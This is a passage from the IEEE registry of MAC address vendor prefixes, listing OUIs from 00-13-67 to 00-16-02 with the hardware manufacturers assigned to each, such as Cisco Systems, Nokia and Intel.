Technologies Inc. 00-13-67 (hex) Narayon. Co., Ltd. 00-13-68 (hex) Maersk Data Defence 00-13-69 (hex) Honda Electron Co., LED. 00-13-6A (hex) Hach Lange SA 00-13-6B (hex) E-TEC 2-17-14-503 Hakataekimae 00-13-6C (hex) TomTom 00-13-6D (hex) Tentaculus AB 00-13-6E (hex) Techmetro Corp. 00-13-6F (hex) PacketMotion, Inc. 00-13-70 (hex) Nokia Danmark A/S 00-13-71 (hex) Motorola Mobility, Inc. 00-13-72 (hex) Dell Inc. 00-13-73 (hex) BLwave Electronics Co., Ltd 00-13-74 (hex) Atheros Communications, Inc. 00-13-75 (hex) American Security Products Co. 00-13-76 (hex) Tabor Electronics Ltd. 00-13-77 (hex) Samsung Electronics CO., LTD 00-13-78 (hex) QSAN Technology, Inc. 00-13-79 (hex) PONDER INFORMATION INDUSTRIES LTD. 00-13-7A (hex) Netvox Technology Co., Ltd. 00-13-7B (hex) Movon Corporation 00-13-7C (hex) Kaicom co., Ltd. 00-13-7D (hex) Dynalab, Inc. 00-13-7E (hex) CorEdge Networks, Inc. 00-13-7F (hex) Cisco Systems 00-13-80 (hex) Cisco Systems 00-13-81 (hex) CHIPS & Systems, Inc. 00-13-82 (hex) Cetacea Networks Corporation 00-13-83 (hex) Application Technologies and Engineering Research Laboratory 00-13-84 (hex) Advanced Motion Controls 00-13-85 (hex) Add-On Technology Co., LTD. 00-13-86 (hex) ABB Inc./Totalflow 00-13-87 (hex) 27M Technologies AB 00-13-88 (hex) WiMedia Alliance 00-13-89 (hex) Redes de Telefonía Móvil S.A. 00-13-8A (hex) QINGDAO GOERTEK ELECTRONICS CO.,LTD. 00-13-8B (hex) Phantom Technologies LLC 00-13-8C (hex) Kumyoung.Co.Ltd 00-13-8D (hex) Kinghold 00-13-8E (hex) FOAB Elektronik AB 00-13-8F (hex) Asiarock Incorporation 00-13-90 (hex) Termtek Computer Co., Ltd 00-13-91 (hex) OUEN CO.,LTD. 00-13-92 (hex) Ruckus Wireless 00-13-93 (hex) Panta Systems, Inc. 00-13-94 (hex) Infohand Co.,Ltd 00-13-95 (hex) congatec AG 00-13-96 (hex) Acbel Polytech Inc. 00-13-97 (hex) Xsigo Systems, Inc. 00-13-98 (hex) TrafficSim Co.,Ltd 00-13-99 (hex) STAC Corporation. 00-13-9A (hex) K-ubique ID Corp. 00-13-9B (hex) ioIMAGE Ltd. 00-13-9C (hex) Exavera Technologies, Inc. 00-13-9D (hex) Marvell Hispana S.L. 00-13-9E (hex) Ciara Technologies Inc. 00-13-9F (hex) Electronics Design Services, Co., Ltd. 00-13-A0 (hex) ALGOSYSTEM Co., Ltd. 00-13-A1 (hex) Crow Electronic Engeneering 00-13-A2 (hex) MaxStream, Inc 00-13-A3 (hex) Siemens Com CPE Devices 00-13-A4 (hex) KeyEye Communications 00-13-A5 (hex) General Solutions, LTD. 00-13-A6 (hex) Extricom Ltd 00-13-A7 (hex) BATTELLE MEMORIAL INSTITUTE 00-13-A8 (hex) Tanisys Technology 00-13-A9 (hex) Sony Corporation 00-13-AA (hex) ALS & TEC Ltd. 00-13-AB (hex) Telemotive AG 00-13-AC (hex) Sunmyung Electronics Co., LTD 00-13-AD (hex) Sendo Ltd 00-13-AE (hex) Radiance Technologies, Inc. 00-13-AF (hex) NUMA Technology,Inc. 00-13-B0 (hex) Jablotron 00-13-B1 (hex) Intelligent Control Systems (Asia) Pte Ltd 00-13-B2 (hex) Carallon Limited 00-13-B3 (hex) Ecom Communications Technology Co., Ltd. 00-13-B4 (hex) Appear TV 00-13-B5 (hex) Wavesat 00-13-B6 (hex) Sling Media, Inc. 00-13-B7 (hex) Scantech ID 00-13-B8 (hex) RyCo Electronic Systems Limited 00-13-B9 (hex) BM SPA 00-13-BA (hex) ReadyLinks Inc 00-13-BB (hex) Smartvue Corporation 00-13-BC (hex) Artimi Ltd 00-13-BD (hex) HYMATOM SA 00-13-BE (hex) Virtual Conexions 00-13-BF (hex) Media System Planning Corp. 00-13-C0 (hex) Trix Tecnologia Ltda. 00-13-C1 (hex) Asoka USA Corporation 00-13-C2 (hex) WACOM Co.,Ltd 00-13-C3 (hex) Cisco Systems 00-13-C4 (hex) Cisco Systems 00-13-C5 (hex) LIGHTRON FIBER-OPTIC DEVICES INC. 00-13-C6 (hex) OpenGear, Inc 00-13-C7 (hex) IONOS Co.,Ltd. 00-13-C8 (hex) PIRELLI BROADBAND SOLUTIONS S.P.A. 00-13-C9 (hex) Beyond Achieve Enterprises Ltd. 00-13-CA (hex) Pico Digital 00-13-CB (hex) Zenitel Norway AS 00-13-CC (hex) Tall Maple Systems 00-13-CD (hex) MTI co. LTD 00-13-CE (hex) Intel Corporate 00-13-CF (hex) 4Access Communications 00-13-D0 (hex) t+ Medical Ltd 00-13-D1 (hex) KIRK telecom A/S 00-13-D2 (hex) PAGE IBERICA, S.A. 00-13-D3 (hex) MICRO-STAR INTERNATIONAL CO., LTD. 00-13-D4 (hex) ASUSTek COMPUTER INC. 00-13-D5 (hex) RuggedCom 00-13-D6 (hex) TII NETWORK TECHNOLOGIES, INC. 00-13-D7 (hex) SPIDCOM Technologies SA 00-13-D8 (hex) Princeton Instruments 00-13-D9 (hex) Matrix Product Development, Inc. 00-13-DA (hex) Diskware Co., Ltd 00-13-DB (hex) SHOEI Electric Co.,Ltd 00-13-DC (hex) IBTEK INC. 00-13-DD (hex) Abbott Diagnostics 00-13-DE (hex) Adapt4, LLC 00-13-DF (hex) Ryvor Corp. 00-13-E0 (hex) Murata Manufacturing Co., Ltd. 00-13-E1 (hex) Iprobe AB 00-13-E2 (hex) GeoVision Inc. 00-13-E3 (hex) CoVi Technologies, Inc. 00-13-E4 (hex) YANGJAE SYSTEMS CORP. 00-13-E5 (hex) TENOSYS, INC. 00-13-E6 (hex) Technolution 00-13-E7 (hex) Halcro 00-13-E8 (hex) Intel Corporate 00-13-E9 (hex) VeriWave, Inc. 00-13-EA (hex) Kamstrup A/S 00-13-EB (hex) Sysmaster Corporation 00-13-EC (hex) Sunbay Software AG 00-13-ED (hex) PSIA 00-13-EE (hex) JBX Designs Inc. 00-13-EF (hex) Kingjon Digital Technology Co.,Ltd 00-13-F0 (hex) Wavefront Semiconductor 00-13-F1 (hex) AMOD Technology Co., Ltd. 00-13-F2 (hex) Klas Ltd 00-13-F3 (hex) Giga-byte Communications Inc. 00-13-F4 (hex) Psitek (Pty) Ltd 00-13-F5 (hex) Akimbi Systems 00-13-F6 (hex) Cintech 00-13-F7 (hex) SMC Networks, Inc. 00-13-F8 (hex) Dex Security Solutions 00-13-F9 (hex) Cavera Systems 00-13-FA (hex) LifeSize Communications, Inc 00-13-FB (hex) RKC INSTRUMENT INC. 00-13-FC (hex) SiCortex, Inc 00-13-FD (hex) Nokia Danmark A/S 00-13-FE (hex) GRANDTEC ELECTRONIC CORP. 00-13-FF (hex) Dage-MTI of MC, Inc. 00-14-00 (hex) MINERVA KOREA CO., LTD 00-14-01 (hex) Rivertree Networks Corp. 00-14-02 (hex) kk-electronic a/s 00-14-03 (hex) Renasis, LLC 00-14-04 (hex) Motorola Mobility, Inc. 00-14-05 (hex) OpenIB, Inc. 00-14-06 (hex) Go Networks 00-14-07 (hex) Sperian Protection Instrumentation 00-14-08 (hex) Eka Systems Inc. 00-14-09 (hex) MAGNETI MARELLI S.E. S.p.A. 00-14-0A (hex) WEPIO Co., Ltd. 00-14-0B (hex) FIRST INTERNATIONAL COMPUTER, INC. 00-14-0C (hex) GKB CCTV CO., LTD. 00-14-0D (hex) Nortel 00-14-0E (hex) Nortel 00-14-0F (hex) Federal State Unitary Enterprise Leningrad R&D Institute of 00-14-10 (hex) Suzhou Keda Technology CO.,Ltd 00-14-11 (hex) Deutschmann Automation GmbH & Co. KG 00-14-12 (hex) S-TEC electronics AG 00-14-13 (hex) Trebing & Himstedt Prozessautomation GmbH & Co. KG 00-14-14 (hex) Jumpnode Systems LLC. 00-14-15 (hex) Intec Automation Inc. 00-14-16 (hex) Scosche Industries, Inc. 00-14-17 (hex) RSE Informations Technologie GmbH 00-14-18 (hex) C4Line 00-14-19 (hex) SIDSA 00-14-1A (hex) DEICY CORPORATION 00-14-1B (hex) Cisco Systems 00-14-1C (hex) Cisco Systems 00-14-1D (hex) Lust Antriebstechnik GmbH 00-14-1E (hex) P.A. Semi, Inc. 00-14-1F (hex) SunKwang Electronics Co., Ltd 00-14-20 (hex) G-Links networking company 00-14-21 (hex) Total Wireless Technologies Pte. Ltd. 00-14-22 (hex) Dell Inc. 00-14-23 (hex) J-S Co. NEUROCOM 00-14-24 (hex) Merry Electrics CO., LTD. 00-14-25 (hex) Galactic Computing Corp. 00-14-26 (hex) NL Technology 00-14-27 (hex) JazzMutant 00-14-28 (hex) Vocollect, Inc 00-14-29 (hex) V Center Technologies Co., Ltd. 00-14-2A (hex) Elitegroup Computer System Co., Ltd 00-14-2B (hex) Edata Communication Inc. 00-14-2C (hex) Koncept International, Inc. 00-14-2D (hex) Toradex AG 00-14-2E (hex) 77 Elektronika Kft. 00-14-2F (hex) WildPackets 00-14-30 (hex) ViPowER, Inc 00-14-31 (hex) PDL Electronics Ltd 00-14-32 (hex) Tarallax Wireless, Inc. 00-14-33 (hex) Empower Technologies(Canada) Inc. 00-14-34 (hex) Keri Systems, Inc 00-14-35 (hex) CityCom Corp. 00-14-36 (hex) Qwerty Elektronik AB 00-14-37 (hex) GSTeletech Co.,Ltd. 00-14-38 (hex) Hewlett-Packard Company 00-14-39 (hex) Blonder Tongue Laboratories, Inc. 00-14-3A (hex) RAYTALK INTERNATIONAL SRL 00-14-3B (hex) Sensovation AG 00-14-3C (hex) Rheinmetall Canada Inc. 00-14-3D (hex) Aevoe Inc. 00-14-3E (hex) AirLink Communications, Inc. 00-14-3F (hex) Hotway Technology Corporation 00-14-40 (hex) ATOMIC Corporation 00-14-41 (hex) Innovation Sound Technology Co., LTD. 00-14-42 (hex) ATTO CORPORATION 00-14-43 (hex) Consultronics Europe Ltd 00-14-44 (hex) Grundfos Electronics 00-14-45 (hex) Telefon-Gradnja d.o.o. 00-14-46 (hex) SuperVision Solutions LLC 00-14-47 (hex) BOAZ Inc. 00-14-48 (hex) Inventec Multimedia & Telecom Corporation 00-14-49 (hex) Sichuan Changhong Electric Ltd. 00-14-4A (hex) Taiwan Thick-Film Ind. Corp. 00-14-4B (hex) Hifn, Inc. 00-14-4C (hex) General Meters Corp. 00-14-4D (hex) Intelligent Systems 00-14-4E (hex) SRISA 00-14-4F (hex) Oracle Corporation 00-14-50 (hex) Heim Systems GmbH 00-14-51 (hex) Apple Computer Inc. 00-14-52 (hex) CALCULEX,INC. 00-14-53 (hex) ADVANTECH TECHNOLOGIES CO.,LTD 00-14-54 (hex) Symwave 00-14-55 (hex) Coder Electronics Corporation 00-14-56 (hex) Edge Products 00-14-57 (hex) T-VIPS AS 00-14-58 (hex) HS Automatic ApS 00-14-59 (hex) Moram Co., Ltd. 00-14-5A (hex) Neratec AG 00-14-5B (hex) SeekerNet Inc. 00-14-5C (hex) Intronics B.V. 00-14-5D (hex) WJ Communications, Inc. 00-14-5E (hex) IBM Corp 00-14-5F (hex) ADITEC CO. LTD 00-14-60 (hex) Kyocera Wireless Corp. 00-14-61 (hex) CORONA CORPORATION 00-14-62 (hex) Digiwell Technology, inc 00-14-63 (hex) IDCS N.V. 00-14-64 (hex) Cryptosoft 00-14-65 (hex) Novo Nordisk A/S 00-14-66 (hex) Kleinhenz Elektronik GmbH 00-14-67 (hex) ArrowSpan Inc. 00-14-68 (hex) CelPlan International, Inc. 00-14-69 (hex) Cisco Systems 00-14-6A (hex) Cisco Systems 00-14-6B (hex) Anagran, Inc. 00-14-6C (hex) Netgear Inc. 00-14-6D (hex) RF Technologies 00-14-6E (hex) H. Stoll GmbH & Co. KG 00-14-6F (hex) Kohler Co 00-14-70 (hex) Prokom Software SA 00-14-71 (hex) Eastern Asia Technology Limited 00-14-72 (hex) China Broadband Wireless IP Standard Group 00-14-73 (hex) Bookham Inc 00-14-74 (hex) K40 Electronics 00-14-75 (hex) Wiline Networks, Inc. 00-14-76 (hex) MultiCom Industries Limited 00-14-77 (hex) Nertec Inc. 00-14-78 (hex) ShenZhen TP-LINK Technologies Co., Ltd. 00-14-79 (hex) NEC Magnus Communications,Ltd. 00-14-7A (hex) Eubus GmbH 00-14-7B (hex) Iteris, Inc. 00-14-7C (hex) 3Com Ltd 00-14-7D (hex) Aeon Digital International 00-14-7E (hex) InnerWireless 00-14-7F (hex) Thomson Telecom Belgium 00-14-80 (hex) Hitachi-LG Data Storage Korea, Inc 00-14-81 (hex) Multilink Inc 00-14-82 (hex) GoBackTV, Inc 00-14-83 (hex) eXS Inc. 00-14-84 (hex) Cermate Technologies Inc. 00-14-85 (hex) Giga-Byte 00-14-86 (hex) Echo Digital Audio Corporation 00-14-87 (hex) American Technology Integrators 00-14-88 (hex) Akorri 00-14-89 (hex) B15402100 - JANDEI, S.L. 00-14-8A (hex) Elin Ebg Traction Gmbh 00-14-8B (hex) Globo Electronic GmbH & Co. KG 00-14-8C (hex) Fortress Technologies 00-14-8D (hex) Cubic Defense Simulation Systems 00-14-8E (hex) Tele Power Inc. 00-14-8F (hex) Protronic (Far East) Ltd. 00-14-90 (hex) ASP Corporation 00-14-91 (hex) Daniels Electronics Ltd. 00-14-92 (hex) Liteon, Mobile Media Solution SBU 00-14-93 (hex) Systimax Solutions 00-14-94 (hex) ESU AG 00-14-95 (hex) 2Wire, Inc. 00-14-96 (hex) Phonic Corp. 00-14-97 (hex) ZHIYUAN Eletronics co.,ltd. 00-14-98 (hex) Viking Design Technology 00-14-99 (hex) Helicomm Inc 00-14-9A (hex) Motorola Mobility, Inc. 00-14-9B (hex) Nokota Communications, LLC 00-14-9C (hex) HF Company 00-14-9D (hex) Sound ID Inc. 00-14-9E (hex) UbONE Co., Ltd 00-14-9F (hex) System and Chips, Inc. 00-14-A0 (hex) Accsense, Inc. 00-14-A1 (hex) Synchronous Communication Corp 00-14-A2 (hex) Core Micro Systems Inc. 00-14-A3 (hex) Vitelec BV 00-14-A4 (hex) Hon Hai Precision Ind. Co., Ltd. 00-14-A5 (hex) Gemtek Technology Co., Ltd. 00-14-A6 (hex) Teranetics, Inc. 00-14-A7 (hex) Nokia Danmark A/S 00-14-A8 (hex) Cisco Systems 00-14-A9 (hex) Cisco Systems 00-14-AA (hex) Ashly Audio, Inc. 00-14-AB (hex) Senhai Electronic Technology Co., Ltd. 00-14-AC (hex) Bountiful WiFi 00-14-AD (hex) Gassner Wiege- u. Meßtechnik GmbH 00-14-AE (hex) Wizlogics Co., Ltd. 00-14-AF (hex) Datasym Inc. 00-14-B0 (hex) Naeil Community 00-14-B1 (hex) Avitec AB 00-14-B2 (hex) mCubelogics Corporation 00-14-B3 (hex) CoreStar International Corp 00-14-B4 (hex) General Dynamics United Kingdom Ltd 00-14-B5 (hex) PHYSIOMETRIX,INC 00-14-B6 (hex) Enswer Technology Inc. 00-14-B7 (hex) AR Infotek Inc. 00-14-B8 (hex) Hill-Rom 00-14-B9 (hex) MSTAR SEMICONDUCTOR 00-14-BA (hex) Carvers SA de CV 00-14-BB (hex) Open Interface North America 00-14-BC (hex) SYNECTIC TELECOM EXPORTS PVT. LTD. 00-14-BD (hex) incNETWORKS, Inc 00-14-BE (hex) Wink communication technology CO.LTD 00-14-BF (hex) Cisco-Linksys LLC 00-14-C0 (hex) Symstream Technology Group Ltd 00-14-C1 (hex) U.S. Robotics Corporation 00-14-C2 (hex) Hewlett-Packard Company 00-14-C3 (hex) Seagate Technology LLC 00-14-C4 (hex) Vitelcom Mobile Technology 00-14-C5 (hex) Alive Technologies Pty Ltd 00-14-C6 (hex) Quixant Ltd 00-14-C7 (hex) Nortel 00-14-C8 (hex) Contemporary Research Corp 00-14-C9 (hex) Brocade Communications Systems, Inc. 00-14-CA (hex) Key Radio Systems Limited 00-14-CB (hex) LifeSync Corporation 00-14-CC (hex) Zetec, Inc. 00-14-CD (hex) DigitalZone Co., Ltd. 00-14-CE (hex) NF CORPORATION 00-14-CF (hex) INVISIO Communications 00-14-D0 (hex) BTI Systems Inc. 00-14-D1 (hex) TRENDnet 00-14-D2 (hex) KYUKI CORPORATION 00-14-D3 (hex) SEPSA 00-14-D4 (hex) K Technology Corporation 00-14-D5 (hex) Datang Telecom Technology CO. , LCD,Optical Communication Br 00-14-D6 (hex) Jeongmin Electronics Co.,Ltd. 00-14-D7 (hex) Datastore Technology Corp 00-14-D8 (hex) bio-logic SA 00-14-D9 (hex) IP Fabrics, Inc. 00-14-DA (hex) Huntleigh Healthcare 00-14-DB (hex) Elma Trenew Electronic GmbH 00-14-DC (hex) Communication System Design & Manufacturing (CSDM) 00-14-DD (hex) Covergence Inc. 00-14-DE (hex) Sage Instruments Inc. 00-14-DF (hex) HI-P Tech Corporation 00-14-E0 (hex) LET'S Corporation 00-14-E1 (hex) Data Display AG 00-14-E2 (hex) datacom systems inc. 00-14-E3 (hex) mm-lab GmbH 00-14-E4 (hex) Integral Technologies 00-14-E5 (hex) Alticast 00-14-E6 (hex) AIM Infrarotmodule GmbH 00-14-E7 (hex) Stolinx,. Inc 00-14-E8 (hex) Motorola Mobility, Inc. 00-14-E9 (hex) Nortech International 00-14-EA (hex) S Digm Inc. (Safe Paradigm Inc.) 00-14-EB (hex) AwarePoint Corporation 00-14-EC (hex) Acro Telecom 00-14-ED (hex) Airak, Inc. 00-14-EE (hex) Western Digital Technologies, Inc. 00-14-EF (hex) TZero Technologies, Inc. 00-14-F0 (hex) Business Security OL AB 00-14-F1 (hex) Cisco Systems 00-14-F2 (hex) Cisco Systems 00-14-F3 (hex) ViXS Systems Inc 00-14-F4 (hex) DekTec Digital Video B.V. 00-14-F5 (hex) OSI Security Devices 00-14-F6 (hex) Juniper Networks, Inc. 00-14-F7 (hex) Crevis 00-14-F8 (hex) Scientific Atlanta 00-14-F9 (hex) Vantage Controls 00-14-FA (hex) AsGa S.A. 00-14-FB (hex) Technical Solutions Inc. 00-14-FC (hex) Extandon, Inc. 00-14-FD (hex) Thecus Technology Corp. 00-14-FE (hex) Artech Electronics 00-14-FF (hex) Precise Automation, Inc. 00-15-00 (hex) Intel Corporate 00-15-01 (hex) LexBox 00-15-02 (hex) BETA tech 00-15-03 (hex) PROFIcomms s.r.o. 00-15-04 (hex) GAME PLUS CO., LTD. 00-15-05 (hex) Actiontec Electronics, Inc 00-15-06 (hex) Neo Photonics 00-15-07 (hex) Renaissance Learning Inc 00-15-08 (hex) Global Target Enterprise Inc 00-15-09 (hex) Plus Technology Co., Ltd 00-15-0A (hex) Sonoa Systems, Inc 00-15-0B (hex) SAGE INFOTECH LTD. 00-15-0C (hex) AVM GmbH 00-15-0D (hex) Hoana Medical, Inc. 00-15-0E (hex) OPENBRAIN TECHNOLOGIES CO., LTD. 00-15-0F (hex) mingjong 00-15-10 (hex) Techsphere Co., Ltd 00-15-11 (hex) Data Center Systems 00-15-12 (hex) Zurich University of Applied Sciences 00-15-13 (hex) EFS sas 00-15-14 (hex) Hu Zhou NAVA Networks&Electronics Ltd. 00-15-15 (hex) Leipold+Co.GmbH 00-15-16 (hex) URIEL SYSTEMS INC. 00-15-17 (hex) Intel Corporate 00-15-18 (hex) Shenzhen 10MOONS Technology Development CO.,Ltd 00-15-19 (hex) StoreAge Networking Technologies 00-15-1A (hex) Hunter Engineering Company 00-15-1B (hex) Isilon Systems Inc. 00-15-1C (hex) LENECO 00-15-1D (hex) M2I CORPORATION 00-15-1E (hex) Ethernet Powerlink Standardization Group (EPSG) 00-15-1F (hex) Multivision Intelligent Surveillance (Hong Kong) Ltd 00-15-20 (hex) Radiocrafts AS 00-15-21 (hex) Horoquartz 00-15-22 (hex) Dea Security 00-15-23 (hex) Meteor Communications Corporation 00-15-24 (hex) Numatics, Inc. 00-15-25 (hex) Chamberlain Access Solutions 00-15-26 (hex) Remote Technologies Inc 00-15-27 (hex) Balboa Instruments 00-15-28 (hex) Beacon Medical Products LLC d.b.a. BeaconMedaes 00-15-29 (hex) N3 Corporation 00-15-2A (hex) Nokia GmbH 00-15-2B (hex) Cisco Systems 00-15-2C (hex) Cisco Systems 00-15-2D (hex) TenX Networks, LLC 00-15-2E (hex) PacketHop, Inc. 00-15-2F (hex) Motorola Mobility, Inc. 00-15-30 (hex) Bus-Tech, Inc. 00-15-31 (hex) KOCOM 00-15-32 (hex) Consumer Technologies Group, LLC 00-15-33 (hex) NADAM.CO.,LTD 00-15-34 (hex) A BELTRÓNICA, Companhia de Comunicações, Lda 00-15-35 (hex) OTE Spa 00-15-36 (hex) Powertech co.,Ltd 00-15-37 (hex) Ventus Networks 00-15-38 (hex) RFID, Inc. 00-15-39 (hex) Technodrive SRL 00-15-3A (hex) Shenzhen Syscan Technology Co.,Ltd. 00-15-3B (hex) EMH metering GmbH & Co. KG 00-15-3C (hex) Kprotech Co., Ltd. 00-15-3D (hex) ELIM PRODUCT CO. 00-15-3E (hex) Q-Matic Sweden AB 00-15-3F (hex) Alcatel Alenia Space Italia 00-15-40 (hex) Nortel 00-15-41 (hex) StrataLight Communications, Inc. 00-15-42 (hex) MICROHARD S.R.L. 00-15-43 (hex) Aberdeen Test Center 00-15-44 (hex) coM.s.a.t. AG 00-15-45 (hex) SEECODE Co., Ltd. 00-15-46 (hex) ITG Worldwide Sdn Bhd 00-15-47 (hex) AiZen Solutions Inc. 00-15-48 (hex) CUBE TECHNOLOGIES 00-15-49 (hex) Dixtal Biomedica Ind. Com. Ltda 00-15-4A (hex) WANSHIH ELECTRONIC CO., LTD 00-15-4B (hex) Wonde Proud Technology Co., Ltd 00-15-4C (hex) Saunders Electronics 00-15-4D (hex) Netronome Systems, Inc. 00-15-4E (hex) IEC 00-15-4F (hex) one RF Technology 00-15-50 (hex) Nits Technology Inc 00-15-51 (hex) RadioPulse Inc. 00-15-52 (hex) Wi-Gear Inc. 00-15-53 (hex) Cytyc Corporation 00-15-54 (hex) Atalum Wireless S.A. 00-15-55 (hex) DFM GmbH 00-15-56 (hex) SAGEM COMMUNICATION 00-15-57 (hex) Olivetti 00-15-58 (hex) FOXCONN 00-15-59 (hex) Securaplane Technologies, Inc. 00-15-5A (hex) DAINIPPON PHARMACEUTICAL CO., LTD. 00-15-5B (hex) Sampo Corporation 00-15-5C (hex) Dresser Wayne 00-15-5D (hex) Microsoft Corporation 00-15-5E (hex) Morgan Stanley 00-15-5F (hex) GreenPeak Technologies 00-15-60 (hex) Hewlett-Packard Company 00-15-61 (hex) JJPlus Corporation 00-15-62 (hex) Cisco Systems 00-15-63 (hex) Cisco Systems 00-15-64 (hex) BEHRINGER Spezielle Studiotechnik GmbH 00-15-65 (hex) XIAMEN YEALINK NETWORK TECHNOLOGY CO.,LTD 00-15-66 (hex) A-First Technology Co., Ltd. 00-15-67 (hex) RADWIN Inc. 00-15-68 (hex) Dilithium Networks 00-15-69 (hex) PECO II, Inc. 00-15-6A (hex) DG2L Technologies Pvt. Ltd. 00-15-6B (hex) Perfisans Networks Corp. 00-15-6C (hex) SANE SYSTEM CO., LTD 00-15-6D (hex) Ubiquiti Networks Inc. 00-15-6E (hex) A. W. Communication Systems Ltd 00-15-6F (hex) Xiranet Communications GmbH 00-15-70 (hex) Symbol TechnologiesWholly owned Subsidiary of Motorola 00-15-71 (hex) Nolan Systems 00-15-72 (hex) Red-Lemon 00-15-73 (hex) NewSoft Technology Corporation 00-15-74 (hex) Horizon Semiconductors Ltd. 00-15-75 (hex) Nevis Networks Inc. 00-15-76 (hex) scil animal care company GmbH 00-15-77 (hex) Allied Telesis 00-15-78 (hex) Audio / Video Innovations 00-15-79 (hex) Lunatone Industrielle Elektronik GmbH 00-15-7A (hex) Telefin S.p.A. 00-15-7B (hex) Leuze electronic GmbH + Co. KG 00-15-7C (hex) Dave Networks, Inc. 00-15-7D (hex) POSDATA CO., LTD. 00-15-7E (hex) Weidmüller Interface GmbH & Co. KG 00-15-7F (hex) ChuanG International Holding CO.,LTD. 00-15-80 (hex) U-WAY CORPORATION 00-15-81 (hex) MAKUS Inc. 00-15-82 (hex) TVonics Ltd 00-15-83 (hex) IVT corporation 00-15-84 (hex) Schenck Process GmbH 00-15-85 (hex) Aonvision Technolopy Corp. 00-15-86 (hex) Xiamen Overseas Chinese Electronic Co., Ltd. 00-15-87 (hex) Takenaka Seisakusho Co.,Ltd 00-15-88 (hex) Balda Solution Malaysia Sdn Bhd 00-15-89 (hex) D-MAX Technology Co.,Ltd 00-15-8A (hex) SURECOM Technology Corp. 00-15-8B (hex) Park Air Systems Ltd 00-15-8C (hex) Liab ApS 00-15-8D (hex) Jennic Ltd 00-15-8E (hex) Plustek.INC 00-15-8F (hex) NTT Advanced Technology Corporation 00-15-90 (hex) Hectronic GmbH 00-15-91 (hex) RLW Inc. 00-15-92 (hex) Facom UK Ltd (Melksham) 00-15-93 (hex) U4EA Technologies Inc. 00-15-94 (hex) BIXOLON CO.,LTD 00-15-95 (hex) Quester Tangent Corporation 00-15-96 (hex) ARRIS International 00-15-97 (hex) AETA AUDIO SYSTEMS 00-15-98 (hex) Kolektor group 00-15-99 (hex) Samsung Electronics Co., LTD 00-15-9A (hex) Motorola Mobility, Inc. 00-15-9B (hex) Nortel 00-15-9C (hex) B-KYUNG SYSTEM Co.,Ltd. 00-15-9D (hex) Minicom Advanced Systems ltd 00-15-9E (hex) Mad Catz Interactive Inc 00-15-9F (hex) Terascala, Inc. 00-15-A0 (hex) Nokia Danmark A/S 00-15-A1 (hex) ECA-SINTERS 00-15-A2 (hex) ARRIS International 00-15-A3 (hex) ARRIS International 00-15-A4 (hex) ARRIS International 00-15-A5 (hex) DCI Co., Ltd. 00-15-A6 (hex) Digital Electronics Products Ltd. 00-15-A7 (hex) Robatech AG 00-15-A8 (hex) Motorola Mobility, Inc. 00-15-A9 (hex) KWANG WOO I&C CO.,LTD 00-15-AA (hex) Rextechnik International Co., 00-15-AB (hex) PRO CO SOUND INC 00-15-AC (hex) Capelon AB 00-15-AD (hex) Accedian Networks 00-15-AE (hex) kyung il 00-15-AF (hex) AzureWave Technologies, Inc. 00-15-B0 (hex) AUTOTELENET CO.,LTD 00-15-B1 (hex) Ambient Corporation 00-15-B2 (hex) Advanced Industrial Computer, Inc. 00-15-B3 (hex) Caretech AB 00-15-B4 (hex) Polymap Wireless LLC 00-15-B5 (hex) CI Network Corp. 00-15-B6 (hex) ShinMaywa Industries, Ltd. 00-15-B7 (hex) Toshiba 00-15-B8 (hex) Tahoe 00-15-B9 (hex) Samsung Electronics Co., Ltd. 00-15-BA (hex) iba AG 00-15-BB (hex) SMA Solar Technology AG 00-15-BC (hex) Develco 00-15-BD (hex) Group 4 Technology Ltd 00-15-BE (hex) Iqua Ltd. 00-15-BF (hex) technicob 00-15-C0 (hex) DIGITAL TELEMEDIA CO.,LTD. 00-15-C1 (hex) SONY Computer Entertainment inc, 00-15-C2 (hex) 3M Germany 00-15-C3 (hex) Ruf Telematik AG 00-15-C4 (hex) FLOVEL CO., LTD. 00-15-C5 (hex) Dell Inc 00-15-C6 (hex) Cisco Systems 00-15-C7 (hex) Cisco Systems 00-15-C8 (hex) FlexiPanel Ltd 00-15-C9 (hex) Gumstix, Inc 00-15-CA (hex) TeraRecon, Inc. 00-15-CB (hex) Surf Communication Solutions Ltd. 00-15-CC (hex) TEPCO UQUEST, LTD. 00-15-CD (hex) Exartech International Corp. 00-15-CE (hex) ARRIS International 00-15-CF (hex) ARRIS International 00-15-D0 (hex) ARRIS International 00-15-D1 (hex) ARRIS Group, Inc. 00-15-D2 (hex) Xantech Corporation 00-15-D3 (hex) Pantech&Curitel Communications, Inc. 00-15-D4 (hex) Emitor AB 00-15-D5 (hex) NICEVT 00-15-D6 (hex) OSLiNK Sp. z o.o. 00-15-D7 (hex) Reti Corporation 00-15-D8 (hex) Interlink Electronics 00-15-D9 (hex) PKC Electronics Oy 00-15-DA (hex) IRITEL A.D. 00-15-DB (hex) Canesta Inc. 00-15-DC (hex) KT&C Co., Ltd. 00-15-DD (hex) IP Control Systems Ltd. 00-15-DE (hex) Nokia Danmark A/S 00-15-DF (hex) Clivet S.p.A. 00-15-E0 (hex) ST-Ericsson 00-15-E1 (hex) Picochip Ltd 00-15-E2 (hex) Dr.Ing. Herbert Knauer GmbH 00-15-E3 (hex) Dream Technologies Corporation 00-15-E4 (hex) Zimmer Elektromedizin 00-15-E5 (hex) Cheertek Inc. 00-15-E6 (hex) MOBILE TECHNIKA Inc. 00-15-E7 (hex) Quantec ProAudio 00-15-E8 (hex) Nortel 00-15-E9 (hex) D-Link Corporation 00-15-EA (hex) Tellumat (Pty) Ltd 00-15-EB (hex) ZTE CORPORATION 00-15-EC (hex) Boca Devices LLC 00-15-ED (hex) Fulcrum Microsystems, Inc. 00-15-EE (hex) Omnex Control Systems 00-15-EF (hex) NEC Energy Devices. Ltd. 00-15-F0 (hex) EGO BV 00-15-F1 (hex) KYLINK Communications Corp. 00-15-F2 (hex) ASUSTek COMPUTER INC. 00-15-F3 (hex) PELTOR AB 00-15-F4 (hex) Eventide 00-15-F5 (hex) Sustainable Energy Systems 00-15-F6 (hex) SCIENCE AND ENGINEERING SERVICES, INC. 00-15-F7 (hex) Wintecronics Ltd. 00-15-F8 (hex) Kingtronics Industrial Co. Ltd. 00-15-F9 (hex) Cisco Systems 00-15-FA (hex) Cisco Systems 00-15-FB (hex) setex schermuly textile computer gmbh 00-15-FC (hex) Littelfuse Startco 00-15-FD (hex) Complete Media Systems 00-15-FE (hex) SCHILLING ROBOTICS LLC 00-15-FF (hex) Novatel Wireless, Inc. 00-16-00 (hex) CelleBrite Mobile Synchronization 00-16-01 (hex) Buffalo Inc. 00-16-02 (hex) CEYON TECHNOLOGY CO.,LTD. 